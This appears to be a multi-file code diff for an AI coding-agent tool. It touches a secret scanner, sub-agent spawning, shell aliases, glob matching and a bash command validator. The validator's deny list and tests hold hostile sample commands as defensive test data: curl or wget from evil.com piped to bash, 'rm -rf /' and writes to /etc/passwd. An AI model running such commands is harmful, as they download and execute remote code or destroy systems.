"math" "math"
"regexp" "regexp"
"strings"
) )
// ScanAction determines what to do when a secret is found. // ScanAction determines what to do when a secret is found.
@@ -68,7 +68,7 @@ func (s *Scanner) Scan(content string) []SecretMatch {
for _, p := range s.patterns { for _, p := range s.patterns {
locs := p.Regex.FindAllStringIndex(content, -1) locs := p.Regex.FindAllStringIndex(content, -1)
for _, loc := range locs { for _, loc := range locs {
key := strings.Join([]string{p.Name, string(rune(loc[0])), string(rune(loc[1]))}, ":") key := fmt.Sprintf("%s:%d:%d", p.Name, loc[0], loc[1])
if seen[key] { if seen[key] {
continue continue
} }
@@ -232,7 +232,7 @@ func defaultPatterns() []SecretPattern {
// --- Generic --- // --- Generic ---
{"generic_secret_assign", `(?i)(?:password|secret|token|api_key|apikey|auth)\s*[:=]\s*['"][a-zA-Z0-9_/+=\-]{8,}['"]`}, {"generic_secret_assign", `(?i)(?:password|secret|token|api_key|apikey|auth)\s*[:=]\s*['"][a-zA-Z0-9_/+=\-]{8,}['"]`},
{"env_secret", `(?i)^[A-Z_]{2,}(?:_KEY|_SECRET|_TOKEN|_PASSWORD)\s*=\s*.{8,}$`}, {"env_secret", `(?im)^[A-Z_]{2,}(?:_KEY|_SECRET|_TOKEN|_PASSWORD)\s*=\s*.{8,}$`},
} }
var result []SecretPattern var result []SecretPattern

View File

@@ -375,3 +375,48 @@ func TestFirewall_UnicodeCleanedBeforeSecretScan(t *testing.T) {
t.Error("unicode tags should be stripped") t.Error("unicode tags should be stripped")
} }
} }
func TestFirewall_ActionBlockReturnsBlockedString(t *testing.T) {
// Pattern with ActionBlock should return a blocked marker, not the original content
fw := NewFirewall(FirewallConfig{
ScanOutgoing: true,
EntropyThreshold: 3.0,
})
if err := fw.Scanner().AddPattern("test_block", `BLOCK_THIS_SECRET`, ActionBlock); err != nil {
t.Fatalf("AddPattern: %v", err)
}
msgs := []message.Message{
message.NewUserText("some text BLOCK_THIS_SECRET more text"),
}
cleaned := fw.ScanOutgoingMessages(msgs)
text := cleaned[0].TextContent()
if strings.Contains(text, "BLOCK_THIS_SECRET") {
t.Error("ActionBlock content should not pass through")
}
if !strings.Contains(text, "[BLOCKED:") {
t.Errorf("expected [BLOCKED: ...] marker, got %q", text)
}
}
func TestScanner_DedupKeyNoCollision(t *testing.T) {
// Two matches at byte offsets > 127 in the same pattern should both appear,
// not get deduplicated because of hash collision in the key.
s := NewScanner(3.0)
// Build a string where two matches appear after offset 127
prefix := strings.Repeat("x", 128) // push matches past offset 127
input := prefix + "sk-ant-api03-aaaaaaaabbbbbbbbcccccccc " + prefix + "sk-ant-api03-ddddddddeeeeeeeeffffffff"
matches := s.Scan(input)
count := 0
for _, m := range matches {
if m.Pattern == "anthropic_api_key" {
count++
}
}
if count < 2 {
t.Errorf("expected 2 distinct Anthropic key matches after offset 127, got %d (dedup key collision?)", count)
}
}

View File

@@ -39,6 +39,11 @@ func NewLocal(eng *engine.Engine, providerName, model string) *Local {
} }
func (s *Local) Send(input string) error { func (s *Local) Send(input string) error {
return s.SendWithOptions(input, engine.TurnOptions{})
}
// SendWithOptions is like Send but applies per-turn engine options.
func (s *Local) SendWithOptions(input string, opts engine.TurnOptions) error {
s.mu.Lock() s.mu.Lock()
if s.state != StateIdle { if s.state != StateIdle {
s.mu.Unlock() s.mu.Unlock()
@@ -64,7 +69,7 @@ func (s *Local) Send(input string) error {
} }
} }
turn, err := s.eng.Submit(ctx, input, cb) turn, err := s.eng.SubmitWithOptions(ctx, input, opts, cb)
s.mu.Lock() s.mu.Lock()
s.turn = turn s.turn = turn

View File

@@ -53,6 +53,8 @@ type Status struct {
type Session interface { type Session interface {
// Send submits user input and begins an agentic turn. // Send submits user input and begins an agentic turn.
Send(input string) error Send(input string) error
// SendWithOptions is like Send but applies per-turn engine options.
SendWithOptions(input string, opts engine.TurnOptions) error
// Events returns the channel that receives streaming events. // Events returns the channel that receives streaming events.
// A new channel is created per Send(). Closed when the turn completes. // A new channel is created per Send(). Closed when the turn completes.
Events() <-chan stream.Event Events() <-chan stream.Event

View File

@@ -27,7 +27,7 @@ var paramSchema = json.RawMessage(`{
}, },
"max_turns": { "max_turns": {
"type": "integer", "type": "integer",
"description": "Maximum tool-calling rounds for the elf (default 30)" "description": "Maximum tool-calling rounds for the elf (0 or omit = unlimited)"
} }
}, },
"required": ["prompt"] "required": ["prompt"]
@@ -53,7 +53,6 @@ func (t *Tool) Description() string { return "Spawn a sub-agent (elf) to
func (t *Tool) Parameters() json.RawMessage { return paramSchema } func (t *Tool) Parameters() json.RawMessage { return paramSchema }
func (t *Tool) IsReadOnly() bool { return true } func (t *Tool) IsReadOnly() bool { return true }
func (t *Tool) IsDestructive() bool { return false } func (t *Tool) IsDestructive() bool { return false }
func (t *Tool) ShouldDefer() bool { return true }
type agentArgs struct { type agentArgs struct {
Prompt string `json:"prompt"` Prompt string `json:"prompt"`
@@ -70,11 +69,8 @@ func (t *Tool) Execute(ctx context.Context, args json.RawMessage) (tool.Result,
return tool.Result{}, fmt.Errorf("agent: prompt required") return tool.Result{}, fmt.Errorf("agent: prompt required")
} }
taskType := parseTaskType(a.TaskType) taskType := parseTaskType(a.TaskType, a.Prompt)
maxTurns := a.MaxTurns maxTurns := a.MaxTurns
if maxTurns <= 0 {
maxTurns = 30 // default
}
// Truncate description for tree display // Truncate description for tree display
desc := a.Prompt desc := a.Prompt
@@ -236,7 +232,9 @@ func formatTokens(tokens int) string {
return fmt.Sprintf("%d tokens", tokens) return fmt.Sprintf("%d tokens", tokens)
} }
func parseTaskType(s string) router.TaskType { // parseTaskType maps explicit task_type hints to router TaskType.
// When no hint is provided (empty string), auto-classifies from the prompt.
func parseTaskType(s string, prompt string) router.TaskType {
switch strings.ToLower(s) { switch strings.ToLower(s) {
case "generation": case "generation":
return router.TaskGeneration return router.TaskGeneration
@@ -251,6 +249,6 @@ func parseTaskType(s string) router.TaskType {
case "planning": case "planning":
return router.TaskPlanning return router.TaskPlanning
default: default:
return router.TaskGeneration return router.ClassifyTask(prompt).Type
} }
} }

View File

@@ -0,0 +1,52 @@
package agent
import (
"testing"
"somegit.dev/Owlibou/gnoma/internal/router"
)
func TestParseTaskType_ExplicitHintTakesPrecedence(t *testing.T) {
// Explicit hints should override prompt classification
tests := []struct {
hint string
prompt string
want router.TaskType
}{
{"review", "fix the bug", router.TaskReview},
{"refactor", "write tests", router.TaskRefactor},
{"debug", "plan the architecture", router.TaskDebug},
{"explain", "implement the feature", router.TaskExplain},
{"planning", "debug the crash", router.TaskPlanning},
{"generation", "review the code", router.TaskGeneration},
}
for _, tt := range tests {
got := parseTaskType(tt.hint, tt.prompt)
if got != tt.want {
t.Errorf("parseTaskType(%q, %q) = %s, want %s", tt.hint, tt.prompt, got, tt.want)
}
}
}
func TestParseTaskType_AutoClassifiesWhenNoHint(t *testing.T) {
// No hint → classify from prompt instead of defaulting to TaskGeneration
tests := []struct {
prompt string
want router.TaskType
}{
{"review this pull request", router.TaskReview},
{"fix the failing test", router.TaskDebug},
{"refactor the auth module", router.TaskRefactor},
{"write unit tests for handler", router.TaskUnitTest},
{"explain how the router works", router.TaskExplain},
{"audit security of the API", router.TaskSecurityReview},
{"plan the migration strategy", router.TaskPlanning},
{"scaffold a new service", router.TaskBoilerplate},
}
for _, tt := range tests {
got := parseTaskType("", tt.prompt)
if got != tt.want {
t.Errorf("parseTaskType(%q) = %s, want %s (auto-classified)", tt.prompt, got, tt.want)
}
}
}

View File

@@ -39,7 +39,7 @@ var batchSchema = json.RawMessage(`{
}, },
"max_turns": { "max_turns": {
"type": "integer", "type": "integer",
"description": "Maximum tool-calling rounds per elf (default 30)" "description": "Maximum tool-calling rounds per elf (0 or omit = unlimited)"
} }
}, },
"required": ["tasks"] "required": ["tasks"]
@@ -64,7 +64,6 @@ func (t *BatchTool) Description() string { return "Spawn multiple elfs (
func (t *BatchTool) Parameters() json.RawMessage { return batchSchema } func (t *BatchTool) Parameters() json.RawMessage { return batchSchema }
func (t *BatchTool) IsReadOnly() bool { return true } func (t *BatchTool) IsReadOnly() bool { return true }
func (t *BatchTool) IsDestructive() bool { return false } func (t *BatchTool) IsDestructive() bool { return false }
func (t *BatchTool) ShouldDefer() bool { return true }
type batchArgs struct { type batchArgs struct {
Tasks []batchTask `json:"tasks"` Tasks []batchTask `json:"tasks"`
@@ -89,9 +88,6 @@ func (t *BatchTool) Execute(ctx context.Context, args json.RawMessage) (tool.Res
} }
maxTurns := a.MaxTurns maxTurns := a.MaxTurns
if maxTurns <= 0 {
maxTurns = 30
}
systemPrompt := "You are an elf — a focused sub-agent of gnoma. Complete the given task thoroughly and concisely. Use tools as needed." systemPrompt := "You are an elf — a focused sub-agent of gnoma. Complete the given task thoroughly and concisely. Use tools as needed."
@@ -116,7 +112,7 @@ func (t *BatchTool) Execute(ctx context.Context, args json.RawMessage) (tool.Res
} }
} }
taskType := parseTaskType(task.TaskType) taskType := parseTaskType(task.TaskType, task.Prompt)
e, err := t.manager.Spawn(ctx, taskType, task.Prompt, systemPrompt, maxTurns) e, err := t.manager.Spawn(ctx, taskType, task.Prompt, systemPrompt, maxTurns)
if err != nil { if err != nil {
for _, entry := range elfs { for _, entry := range elfs {

View File

@@ -5,6 +5,7 @@ import (
"fmt" "fmt"
"os" "os"
"os/exec" "os/exec"
"sort"
"strings" "strings"
"sync" "sync"
"time" "time"
@@ -48,6 +49,36 @@ func (m *AliasMap) All() map[string]string {
return cp return cp
} }
// AliasSummary returns a compact, LLM-readable summary of command-replacement aliases —
// those where the expansion's first word differs from the alias name (e.g. find → fd).
// Flag-only aliases (ls → ls --color=auto) are excluded. Returns "" if none found.
func (m *AliasMap) AliasSummary() string {
if m == nil {
return ""
}
m.mu.RLock()
defer m.mu.RUnlock()
var replacements []string
for name, expansion := range m.aliases {
firstWord := expansion
if idx := strings.IndexAny(expansion, " \t"); idx != -1 {
firstWord = expansion[:idx]
}
if firstWord != name && firstWord != "" {
replacements = append(replacements, name+" → "+firstWord)
}
}
if len(replacements) == 0 {
return ""
}
sort.Strings(replacements)
return "Shell command replacements (use replacement's syntax, not original): " +
strings.Join(replacements, ", ") + "."
}
// ExpandCommand expands the first word of a command if it's a known alias. // ExpandCommand expands the first word of a command if it's a known alias.
// Only the first word is expanded (matching bash alias behavior). // Only the first word is expanded (matching bash alias behavior).
// Returns the original command unchanged if no alias matches. // Returns the original command unchanged if no alias matches.

View File

@@ -2,6 +2,7 @@ package bash
import ( import (
"context" "context"
"strings"
"testing" "testing"
) )
@@ -265,6 +266,51 @@ func TestHarvestAliases_Integration(t *testing.T) {
} }
} }
func TestAliasMap_AliasSummary(t *testing.T) {
m := NewAliasMap()
m.mu.Lock()
m.aliases["find"] = "fd"
m.aliases["grep"] = "rg --color=auto"
m.aliases["ls"] = "ls --color=auto" // flag-only, same command — should be excluded
m.aliases["ll"] = "ls -la" // replacement to different command — included
m.mu.Unlock()
summary := m.AliasSummary()
if summary == "" {
t.Fatal("AliasSummary should return non-empty string")
}
for _, want := range []string{"find → fd", "grep → rg", "ll → ls"} {
if !strings.Contains(summary, want) {
t.Errorf("AliasSummary missing %q, got: %q", want, summary)
}
}
// ls → ls (flag-only) should NOT appear
if strings.Contains(summary, "ls → ls") {
t.Errorf("AliasSummary should exclude flag-only aliases (ls → ls), got: %q", summary)
}
}
func TestAliasMap_AliasSummary_Empty(t *testing.T) {
m := NewAliasMap()
m.mu.Lock()
m.aliases["ls"] = "ls --color=auto" // same base command, flags only — excluded
m.mu.Unlock()
if got := m.AliasSummary(); got != "" {
t.Errorf("AliasSummary for same-command aliases should be empty, got %q", got)
}
}
func TestAliasMap_AliasSummary_Nil(t *testing.T) {
var m *AliasMap
if got := m.AliasSummary(); got != "" {
t.Errorf("nil AliasMap.AliasSummary() should return empty, got %q", got)
}
}
func TestBashTool_WithAliases(t *testing.T) { func TestBashTool_WithAliases(t *testing.T) {
aliases := NewAliasMap() aliases := NewAliasMap()
aliases.mu.Lock() aliases.mu.Lock()

View File

@@ -24,6 +24,7 @@ const (
CheckUnicodeWhitespace // non-ASCII whitespace CheckUnicodeWhitespace // non-ASCII whitespace
CheckZshDangerous // zsh-specific dangerous constructs CheckZshDangerous // zsh-specific dangerous constructs
CheckCommentDesync // # inside strings hiding commands CheckCommentDesync // # inside strings hiding commands
CheckIndirectExec // eval, bash -c, curl|bash, source
) )
// SecurityViolation describes a failed security check. // SecurityViolation describes a failed security check.
@@ -89,6 +90,9 @@ func ValidateCommand(cmd string) *SecurityViolation {
if v := checkCommentQuoteDesync(cmd); v != nil { if v := checkCommentQuoteDesync(cmd); v != nil {
return v return v
} }
if v := checkIndirectExec(cmd); v != nil {
return v
}
return nil return nil
} }
@@ -247,6 +251,7 @@ func checkStandaloneSemicolon(cmd string) *SecurityViolation {
} }
// checkSensitiveRedirection blocks output redirection to sensitive paths. // checkSensitiveRedirection blocks output redirection to sensitive paths.
// Detects: >, >>, fd redirects (2>), and no-space variants (>/etc/passwd).
func checkSensitiveRedirection(cmd string) *SecurityViolation { func checkSensitiveRedirection(cmd string) *SecurityViolation {
sensitiveTargets := []string{ sensitiveTargets := []string{
"/etc/passwd", "/etc/shadow", "/etc/sudoers", "/etc/passwd", "/etc/shadow", "/etc/sudoers",
@@ -256,7 +261,14 @@ func checkSensitiveRedirection(cmd string) *SecurityViolation {
} }
for _, target := range sensitiveTargets { for _, target := range sensitiveTargets {
if strings.Contains(cmd, "> "+target) || strings.Contains(cmd, ">>"+target) { // Match any form: >, >>, 2>, 2>>, &> followed by optional whitespace then target
idx := strings.Index(cmd, target)
if idx <= 0 {
continue
}
// Check what precedes the target (skip whitespace backwards)
pre := strings.TrimRight(cmd[:idx], " \t")
if len(pre) > 0 && (pre[len(pre)-1] == '>' || strings.HasSuffix(pre, ">>")) {
return &SecurityViolation{ return &SecurityViolation{
Check: CheckRedirection, Check: CheckRedirection,
Message: fmt.Sprintf("redirection to sensitive path: %s", target), Message: fmt.Sprintf("redirection to sensitive path: %s", target),
@@ -384,14 +396,14 @@ func checkUnicodeWhitespace(cmd string) *SecurityViolation {
} }
// checkZshDangerous detects zsh-specific dangerous constructs. // checkZshDangerous detects zsh-specific dangerous constructs.
// Note: <() and >() are intentionally excluded — they are also valid bash process
// substitution patterns used in legitimate commands (e.g., diff <(cmd1) <(cmd2)).
func checkZshDangerous(cmd string) *SecurityViolation { func checkZshDangerous(cmd string) *SecurityViolation {
dangerousPatterns := []struct { dangerousPatterns := []struct {
pattern string pattern string
msg string msg string
}{ }{
{"=(", "zsh process substitution =() (arbitrary execution)"}, {"=(", "zsh =() process substitution (arbitrary execution)"},
{">(", "zsh output process substitution >()"},
{"<(", "zsh input process substitution <()"},
{"zmodload", "zsh module loading (can load arbitrary code)"}, {"zmodload", "zsh module loading (can load arbitrary code)"},
{"sysopen", "zsh sysopen (direct file descriptor access)"}, {"sysopen", "zsh sysopen (direct file descriptor access)"},
{"ztcp", "zsh TCP socket access"}, {"ztcp", "zsh TCP socket access"},
@@ -476,3 +488,51 @@ func checkDangerousVars(cmd string) *SecurityViolation {
} }
return nil return nil
} }
// checkIndirectExec blocks commands that run arbitrary code indirectly,
// bypassing all other security checks applied to the outer command string.
// These are the highest-risk patterns in an agentic context.
func checkIndirectExec(cmd string) *SecurityViolation {
lower := strings.ToLower(cmd)
// Patterns that execute arbitrary content not visible to the checker.
// Each entry is a substring to look for (after lowercasing).
patterns := []struct {
needle string
msg string
}{
{"eval ", "eval executes arbitrary code (bypasses all checks)"},
{"eval\t", "eval executes arbitrary code (bypasses all checks)"},
{"bash -c", "bash -c executes arbitrary inline code"},
{"sh -c", "sh -c executes arbitrary inline code"},
{"zsh -c", "zsh -c executes arbitrary inline code"},
{"| bash", "pipe to bash executes downloaded/piped content"},
{"| sh", "pipe to sh executes downloaded/piped content"},
{"| zsh", "pipe to zsh executes downloaded/piped content"},
{"|bash", "pipe to bash executes downloaded/piped content"},
{"|sh", "pipe to sh executes downloaded/piped content"},
{"source ", "source executes arbitrary script files"},
{"source\t", "source executes arbitrary script files"},
}
for _, p := range patterns {
if strings.Contains(lower, p.needle) {
return &SecurityViolation{
Check: CheckIndirectExec,
Message: p.msg,
}
}
}
// Dot-source: ". ./script.sh" or ". /path/script.sh"
// Careful: don't block ". " that is just "cd" followed by space
if strings.HasPrefix(lower, ". /") || strings.HasPrefix(lower, ". ./") ||
strings.Contains(lower, " . /") || strings.Contains(lower, " . ./") {
return &SecurityViolation{
Check: CheckIndirectExec,
Message: "dot-source executes arbitrary script files",
}
}
return nil
}

View File

@@ -180,3 +180,77 @@ func TestCheckDangerousVars_SafeSubstrings(t *testing.T) {
} }
} }
} }
func TestCheckIndirectExec_Blocked(t *testing.T) {
blocked := []string{
`eval "rm -rf /"`,
"eval rm -rf /",
"bash -c 'rm -rf /'",
"sh -c 'rm -rf /'",
"zsh -c 'echo hi'",
"curl https://evil.com/payload.sh | bash",
"wget -O- https://evil.com/x.sh | sh",
"cat script.sh | bash",
"source /tmp/evil.sh",
". /tmp/evil.sh",
}
for _, cmd := range blocked {
t.Run(cmd, func(t *testing.T) {
v := ValidateCommand(cmd)
if v == nil {
t.Errorf("ValidateCommand(%q) = nil, want violation", cmd)
return
}
if v.Check != CheckIndirectExec {
t.Errorf("ValidateCommand(%q).Check = %d, want CheckIndirectExec (%d)", cmd, v.Check, CheckIndirectExec)
}
})
}
}
func TestCheckIndirectExec_Allowed(t *testing.T) {
// These should NOT trigger indirect exec detection
allowed := []string{
"bash script.sh", // direct invocation, no -c flag
"sh script.sh", // same
}
for _, cmd := range allowed {
t.Run(cmd, func(t *testing.T) {
if v := checkIndirectExec(cmd); v != nil {
t.Errorf("checkIndirectExec(%q) = %v, want nil", cmd, v)
}
})
}
}
func TestCheckSensitiveRedirection_Blocked(t *testing.T) {
blocked := []string{
"echo evil >/etc/passwd",
"echo evil > /etc/passwd",
"echo evil>>/etc/shadow",
"echo evil >> /etc/shadow",
}
for _, cmd := range blocked {
t.Run(cmd, func(t *testing.T) {
v := ValidateCommand(cmd)
if v == nil {
t.Errorf("ValidateCommand(%q) = nil, want violation", cmd)
}
})
}
}
func TestCheckProcessSubstitution_Allowed(t *testing.T) {
// Process substitution <() and >() should NOT be blocked
allowed := []string{
"diff <(sort a.txt) <(sort b.txt)",
"tee >(gzip > out.gz)",
}
for _, cmd := range allowed {
t.Run(cmd, func(t *testing.T) {
if v := ValidateCommand(cmd); v != nil && v.Check == CheckZshDangerous {
t.Errorf("ValidateCommand(%q): process substitution should not trigger ZshDangerous, got %v", cmd, v)
}
})
}
}

View File

@@ -310,6 +310,62 @@ func TestGlobTool_NoMatches(t *testing.T) {
} }
} }
func TestGlobTool_Doublestar(t *testing.T) {
dir := t.TempDir()
os.MkdirAll(filepath.Join(dir, "internal", "foo"), 0o755)
os.MkdirAll(filepath.Join(dir, "cmd", "bar"), 0o755)
os.WriteFile(filepath.Join(dir, "main.go"), []byte(""), 0o644)
os.WriteFile(filepath.Join(dir, "internal", "foo", "foo.go"), []byte(""), 0o644)
os.WriteFile(filepath.Join(dir, "cmd", "bar", "bar.go"), []byte(""), 0o644)
os.WriteFile(filepath.Join(dir, "cmd", "bar", "bar_test.go"), []byte(""), 0o644)
g := NewGlobTool()
tests := []struct {
pattern string
want int
}{
{"**/*.go", 4},
{"**/*_test.go", 1},
{"internal/**/*.go", 1},
{"cmd/**/*.go", 2},
{"*.go", 1}, // only root-level, no ** — existing behaviour unchanged
}
for _, tc := range tests {
result, err := g.Execute(context.Background(), mustJSON(t, globArgs{Pattern: tc.pattern, Path: dir}))
if err != nil {
t.Fatalf("pattern %q: Execute: %v", tc.pattern, err)
}
if result.Metadata["count"] != tc.want {
t.Errorf("pattern %q: count = %v, want %d\noutput:\n%s", tc.pattern, result.Metadata["count"], tc.want, result.Output)
}
}
}
func TestMatchGlob_DoublestarEdgeCases(t *testing.T) {
tests := []struct {
pattern string
name string
want bool
}{
{"**/*.go", "main.go", true},
{"**/*.go", "internal/foo/foo.go", true},
{"**/*.go", "a/b/c/d.go", true},
{"**/*.go", "main.ts", false},
{"internal/**/*.go", "internal/foo/bar.go", true},
{"internal/**/*.go", "cmd/foo/bar.go", false},
{"**", "anything/goes", true},
{"*.go", "main.go", true},
{"*.go", "sub/main.go", false}, // no ** — single level only
}
for _, tc := range tests {
got := matchGlob(tc.pattern, tc.name)
if got != tc.want {
t.Errorf("matchGlob(%q, %q) = %v, want %v", tc.pattern, tc.name, got, tc.want)
}
}
}
// --- Grep --- // --- Grep ---
func TestGrepTool_Interface(t *testing.T) { func TestGrepTool_Interface(t *testing.T) {

View File

@@ -5,6 +5,7 @@ import (
"encoding/json" "encoding/json"
"fmt" "fmt"
"os" "os"
"path"
"path/filepath" "path/filepath"
"sort" "sort"
"strings" "strings"
@@ -80,13 +81,7 @@ func (t *GlobTool) Execute(_ context.Context, args json.RawMessage) (tool.Result
return nil return nil
} }
matched, err := filepath.Match(a.Pattern, rel) if matchGlob(a.Pattern, rel) {
if err != nil {
// Try matching just the filename for simple patterns
matched, _ = filepath.Match(a.Pattern, d.Name())
}
if matched {
matches = append(matches, rel) matches = append(matches, rel)
} }
return nil return nil
@@ -115,3 +110,50 @@ func (t *GlobTool) Execute(_ context.Context, args json.RawMessage) (tool.Result
Metadata: map[string]any{"count": len(matches), "pattern": a.Pattern}, Metadata: map[string]any{"count": len(matches), "pattern": a.Pattern},
}, nil }, nil
} }
// matchGlob matches a relative path against a glob pattern.
// Unlike filepath.Match, it supports ** to match zero or more path components.
func matchGlob(pattern, name string) bool {
// Normalize to forward slashes for consistent component splitting.
pattern = filepath.ToSlash(pattern)
name = filepath.ToSlash(name)
if !strings.Contains(pattern, "**") {
ok, _ := filepath.Match(pattern, filepath.FromSlash(name))
return ok
}
return matchComponents(strings.Split(pattern, "/"), strings.Split(name, "/"))
}
// matchComponents recursively matches pattern segments against path segments.
// A "**" segment matches zero or more consecutive path components.
func matchComponents(pats, parts []string) bool {
for len(pats) > 0 {
if pats[0] == "**" {
// Consume all leading ** segments.
for len(pats) > 0 && pats[0] == "**" {
pats = pats[1:]
}
if len(pats) == 0 {
return true // trailing ** matches everything
}
// Try anchoring the remaining pattern at each position.
for i := range parts {
if matchComponents(pats, parts[i:]) {
return true
}
}
return false
}
if len(parts) == 0 {
return false
}
ok, err := path.Match(pats[0], parts[0])
if err != nil || !ok {
return false
}
pats = pats[1:]
parts = parts[1:]
}
return len(parts) == 0
}

View File

@@ -3,6 +3,7 @@ package tool
import ( import (
"encoding/json" "encoding/json"
"fmt" "fmt"
"sort"
"sync" "sync"
) )
@@ -40,7 +41,7 @@ func (r *Registry) Get(name string) (Tool, bool) {
return t, ok return t, ok
} }
// All returns all registered tools. // All returns all registered tools sorted by name for deterministic ordering.
func (r *Registry) All() []Tool { func (r *Registry) All() []Tool {
r.mu.RLock() r.mu.RLock()
defer r.mu.RUnlock() defer r.mu.RUnlock()
@@ -48,10 +49,11 @@ func (r *Registry) All() []Tool {
for _, t := range r.tools { for _, t := range r.tools {
all = append(all, t) all = append(all, t)
} }
sort.Slice(all, func(i, j int) bool { return all[i].Name() < all[j].Name() })
return all return all
} }
// Definitions returns tool definitions for all registered tools, // Definitions returns tool definitions for all registered tools sorted by name,
// suitable for sending to the LLM. // suitable for sending to the LLM.
func (r *Registry) Definitions() []Definition { func (r *Registry) Definitions() []Definition {
r.mu.RLock() r.mu.RLock()
@@ -64,6 +66,7 @@ func (r *Registry) Definitions() []Definition {
Parameters: t.Parameters(), Parameters: t.Parameters(),
}) })
} }
sort.Slice(defs, func(i, j int) bool { return defs[i].Name < defs[j].Name })
return defs return defs
} }

File diff suppressed because it is too large Load Diff

View File

@@ -94,6 +94,14 @@ var (
sText = lipgloss.NewStyle(). sText = lipgloss.NewStyle().
Foreground(cText) Foreground(cText)
sThinkingLabel = lipgloss.NewStyle().
Foreground(cOverlay).
Italic(true)
sThinkingBody = lipgloss.NewStyle().
Foreground(cOverlay).
Italic(true)
) )
// Status bar // Status bar